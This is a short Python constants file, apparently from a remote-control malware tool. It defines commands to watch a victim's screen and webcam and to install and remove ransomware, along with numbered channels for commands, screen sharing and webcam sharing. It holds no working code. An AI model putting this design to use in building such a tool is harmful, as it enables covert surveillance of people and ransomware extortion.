WATCH_SCREEN_COMMAND = 'Watch Screen'
WATCH_WEBCAM_COMMAND = 'Watch Web Cam'
INSTALL_RANSOMWARE_COMMAND = 'Install Ransomware'
UNINSTALL_RANSOMWARE_COMMAND = 'Fix Ransomware'

COMMANDS_CHANNEL = '1'
SCREEN_SHARE_CHANNEL = '2'
WEB_CAM_SHARE_CHANNEL = '3'